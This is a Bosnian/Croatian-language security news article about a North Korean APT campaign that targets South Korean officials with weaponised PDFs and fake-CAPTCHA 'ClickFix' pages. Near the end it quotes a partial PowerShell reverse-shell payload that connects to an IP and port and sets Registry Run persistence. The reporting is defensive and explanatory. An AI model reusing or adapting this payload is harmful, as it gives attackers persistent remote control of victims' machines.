Hakeri Velvet Chollima APT-a napadaju vladine službenike naoružanim PDF-om

Pojavila se sofisticirana kampanja sajber špijunaže, koja se pripisuje sjevernokorejskoj grupi za napredne perzistentne prijetnje (APT), Velvet Chollima, a cilja južnokorejske vladine službenike i organizacije na više kontinenata putem oružja u PDF dokumentima i inovativnih tehnika socijalnog inženjeringa.

Grupa Velvet Chollima APT pokrenula je opsežnu sajber kampanju počevši od januara 2025. godine, posebno usmjerenu na južnokorejske vladine zvaničnike, nevladine organizacije, vladine agencije i medijske kompanije širom Sjeverne Amerike, Južne Amerike, Evrope i Istočne Azije.

Napadači koriste sofisticirani višefazni pristup koji počinje pažljivo kreiranim spear-phishing e-porukama koje sadrže maliciozne PDF priloge osmišljene za uspostavljanje početnog kontakta s visokovrijednim metama.

Kampanja pokazuje značajnu evoluciju u taktikama socijalnog inženjeringa, pri čemu se napadači maskiraju kao legitimni južnokorejski vladini zvaničnici kako bi postepeno izgradili povjerenje sa svojim budućim žrtvama.

Ovakav strpljivi pristup omogućava hakerima da uspostave odnos prije nego što isporuče svoje maliciozne sadržaje, što povećava vjerovatnoću uspjeha naknadnog napada.

Inženjer ofanzivne sigurnosti Abdulrehman Ali identifikovao je ovaj obrazac napada kao dio sveobuhvatne simulacije protivnika zasnovane na istraživanju Microsoftovog tima za obavještajne podatke o prijetnjama.

Analiza otkriva da kada mete pokušaju otvoriti naizgled legitimne PDF dokumente, preusmjeravaju se na lažne stranice za registraciju uređaja koje koriste obmanjujuću tehniku ​​poznatu kao ClickFix.

Tehnika ClickFix predstavlja zabrinjavajući napredak u metodologiji socijalnog inženjeringa , koristeći lažne CAPTCHA stranice za verifikaciju kako bi manipulisala žrtvama da izvršavaju maliciozne PowerShell naredbe.

Ovaj pristup zaobilazi tradicionalne sigurnosne mjere uvjeravajući korisnike da dobrovoljno izvršavaju naredbe na administratorskom nivou na svojim sistemima.

Mehanizam infekcije i isporuka korisnog tereta

Jezgro napada Velvet Chollima oslanja se na sofisticirani lažni CAPTCHA interfejs koji automatski kopira maliciozni PowerShell kod u međuskladište žrtve.

Oružani skript uspostavlja obrnutu shell vezu dok implementira mehanizme perzistencije putem modifikacija Windows registra:

while ($true) {
try {
    $client = New-Object System.Net.Sockets.TCPClient('192.168.1.10', 4444);
    $stream = $client.GetStream();
    [byte[]]$bytes = 0..65535|%{0};
    // Registry persistence
    $regPath = "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    Set-ItemProperty -Path $regPath -Name $regName -Value $regValue

Ovaj korisni teret omogućava izvršavanje daljinskih komandi, istovremeno osiguravajući trajnost sistema tokom ponovnog pokretanja, održavajući neovlašteni pristup kompromitovanim sistemima.

Izvor: CyberSecurityNews